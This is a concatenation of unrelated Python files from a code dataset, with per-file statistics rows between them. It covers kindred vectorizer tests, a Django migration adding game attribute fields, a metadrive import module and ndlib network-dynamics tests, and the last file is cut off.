MySqlClient.__init__(self, ip=self.ip,port=self.port, user_name=self.user_name, password=self.password, db_name=self.db_name)
def ownerName(self):
return(self.FOwnerName)
if __name__ == '__main__':
pass
| 43.079646 | 158 | 0.60189 | 631 | 4,868 | 4.44691 | 0.107765 | 0.059872 | 0.039914 | 0.029936 | 0.93407 | 0.93407 | 0.92124 | 0.92124 | 0.887028 | 0.887028 | 0 | 0.021111 | 0.260477 | 4,868 | 112 | 159 | 43.464286 | 0.758333 | 0.037798 | 0 | 0.896226 | 0 | 0 | 0.048812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0.160377 | 0.037736 | 0.037736 | 0.150943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
52dd7aa03076a24fa4216bb76e8d36316293649f | 15,904 | py | Python | tests/test_vectorizer.py | vj1494/kindred | 06d73448c35e65e727cbcaf7b754efa2f725bd5a | [
"MIT"
] | 141 | 2017-08-03T15:51:42.000Z | 2022-01-20T05:16:20.000Z | tests/test_vectorizer.py | vj1494/kindred | 06d73448c35e65e727cbcaf7b754efa2f725bd5a | [
"MIT"
] | 24 | 2017-08-04T12:07:54.000Z | 2021-06-22T12:40:53.000Z | tests/test_vectorizer.py | vj1494/kindred | 06d73448c35e65e727cbcaf7b754efa2f725bd5a | [
"MIT"
] | 34 | 2017-08-22T21:44:36.000Z | 2022-03-27T11:24:19.000Z | import numpy as np
import kindred
import os
import json
from kindred.datageneration import generateData,generateTestData
def check(valueName,value):
write = False
scriptDir = os.path.dirname(__file__)
jsonPath = os.path.join(scriptDir,'data','vectorizer','expected.json')
if os.path.isfile(jsonPath):
with open(jsonPath) as f:
data = json.load(f)
else:
data = {}
if write:
data[valueName] = value
with open(jsonPath,'w') as f:
json.dump(data,f,indent=2,sort_keys=True)
assert valueName in data
assert data[valueName] == value
def test_simpleVectorizer_binary():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer>. <drug id="3">Aspirin</drug> is the main cause of <disease id="4">boneitis</disease> . <relation type="treats" subj="1" obj="2" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 2): 1.0, (0, 3): 1.0, (1, 0): 1.0, (1, 5): 1.0, (2, 2): 1.0, (2, 4): 1.0, (3, 1): 1.0, (3, 5): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_binary',namedCols)
def test_simpleVectorizer_triple():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer> which targets <gene id="3">EGFR</gene>. <relation type="druginfo" drug="1" disease="2" gene="3" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(entityCount=3,featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 1): 1.0, (0, 3): 1.0, (0, 8): 1.0, (1, 1): 1.0, (1, 5): 1.0, (1, 6): 1.0, (2, 0): 1.0, (2, 4): 1.0, (2, 8): 1.0, (3, 0): 1.0, (3, 5): 1.0, (3, 7): 1.0, (4, 2): 1.0, (4, 4): 1.0, (4, 6): 1.0, (5, 2): 1.0, (5, 3): 1.0, (5, 7): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_triple',namedCols)
def test_vectorizer_defaults():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer()
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_2',namedCols2)
def test_vectorizer_entityTypes():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_2',namedCols2)
def test_vectorizer_bigrams():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_2',namedCols2)
def test_vectorizer_dependencyPathEdges():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_2',namedCols2)
def test_vectorizer_entityTypes_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_noTFIDF_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_2',namedCols2)
def test_vectorizer_bigrams_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdges_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_2',namedCols2)
def test_vectorizer_defaults_triple():
corpus1, _ = generateTestData(entityCount=3,positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(entityCount=3,positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer(entityCount=3)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_triple_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_triple_2',namedCols2)
if __name__ == '__main__':
test_vectorizer_defaults_triple()
| 38.695864 | 246 | 0.774711 | 1,897 | 15,904 | 6.402214 | 0.076436 | 0.042651 | 0.021737 | 0.023713 | 0.932153 | 0.927048 | 0.875834 | 0.875834 | 0.875834 | 0.875834 | 0 | 0.039008 | 0.105382 | 15,904 | 410 | 247 | 38.790244 | 0.814591 | 0.058664 | 0 | 0.75 | 1 | 0.006944 | 0.108191 | 0.081645 | 0 | 0 | 0 | 0 | 0.006944 | 1 | 0.052083 | false | 0 | 0.017361 | 0 | 0.069444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
52f0776b72d00b46fefe917df5875612c4dfe004 | 141 | py | Python | metadrive/component/road_network/__init__.py | liuzuxin/metadrive | 850c207536531bc85179084acd7c30ab14a66111 | [
"Apache-2.0"
] | 125 | 2021-08-30T06:33:57.000Z | 2022-03-31T09:02:44.000Z | metadrive/component/road_network/__init__.py | liuzuxin/metadrive | 850c207536531bc85179084acd7c30ab14a66111 | [
"Apache-2.0"
] | 72 | 2021-08-30T16:23:41.000Z | 2022-03-31T19:17:16.000Z | metadrive/component/road_network/__init__.py | liuzuxin/metadrive | 850c207536531bc85179084acd7c30ab14a66111 | [
"Apache-2.0"
] | 20 | 2021-09-09T08:20:25.000Z | 2022-03-24T13:24:07.000Z | from metadrive.component.road_network.road import Road, Route
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
| 47 | 78 | 0.886525 | 19 | 141 | 6.368421 | 0.473684 | 0.272727 | 0.363636 | 0.429752 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 141 | 2 | 79 | 70.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
eaa52882968092b1a73da08c50be7d2d34357226 | 14 | py | Python | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | print(2**179)
| 7 | 13 | 0.642857 | 3 | 14 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.071429 | 14 | 1 | 14 | 14 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
eaf89183e1d467003ef16b9c5856ffd54a262e86 | 8,333 | py | Python | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-07-14 06:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('worlddata', '0005_foods_hunger'),
]
operations = [
migrations.CreateModel(
name='character_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Character Attrubute Information',
'verbose_name_plural': 'Character Attribute Information',
},
),
migrations.CreateModel(
name='equipment_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Equipment Attrubute Information',
'verbose_name_plural': 'Equipment Attribute Information',
},
),
migrations.CreateModel(
name='food_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Food Attrubute Information',
'verbose_name_plural': 'Food Attribute Information',
},
),
migrations.RemoveField(
model_name='character_models',
name='attack',
),
migrations.RemoveField(
model_name='character_models',
name='defence',
),
migrations.RemoveField(
model_name='character_models',
name='max_mp',
),
migrations.RemoveField(
model_name='equipments',
name='attack',
),
migrations.RemoveField(
model_name='equipments',
name='defence',
),
migrations.RemoveField(
model_name='foods',
name='hp',
),
migrations.RemoveField(
model_name='foods',
name='hunger',
),
migrations.RemoveField(
model_name='foods',
name='mp',
),
migrations.AddField(
model_name='character_models',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
]
| 34.292181 | 114 | 0.533781 | 778 | 8,333 | 5.521851 | 0.104113 | 0.136173 | 0.167598 | 0.201117 | 0.926676 | 0.879888 | 0.826117 | 0.791899 | 0.782123 | 0.782123 | 0 | 0.025791 | 0.343934 | 8,333 | 242 | 115 | 34.433884 | 0.760015 | 0.00816 | 0 | 0.897872 | 1 | 0 | 0.129145 | 0.006052 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008511 | 0 | 0.021277 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f49c5fb0527c6cbc6568a90e6187de606b0dbf85 | 4,930 | py | Python | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | from __future__ import absolute_import
import unittest
import networkx as nx
import ndlib.models.ModelConfig as mc
import ndlib.models.CompositeModel as gc
import ndlib.models.compartments as cmp
import ndlib.models.actions as act
__author__ = 'Giulio Rossetti'
__license__ = "BSD-2-Clause"
__email__ = "giulio.rossetti@gmail.com"
class NdlibActionDynamicTest(unittest.TestCase):
def test_compartment_add_node(self):
g = nx.karate_club_graph()
attr = {n: {"even": int(n % 2)} for n in g.nodes()}
nx.set_node_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.AddNode(probability=1, initial_status="Susceptible", copy_attributes=True)
c1 = cmp.NodeStochastic(1)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [35, 36, 37, 38, 39, 40])
def test_compartment_swap_edge(self):
g = nx.karate_club_graph()
attr = {(u, v): {"even": int((u + v) % 10)} for (u, v) in g.edges()}
nx.set_edge_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.SwapEdges(probability=1, number_of_swaps=1, copy_attributes=True, initial_status="Susceptible")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
self.assertEqual(len(iterations), 6)
def test_compartment_remove_node(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1)
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
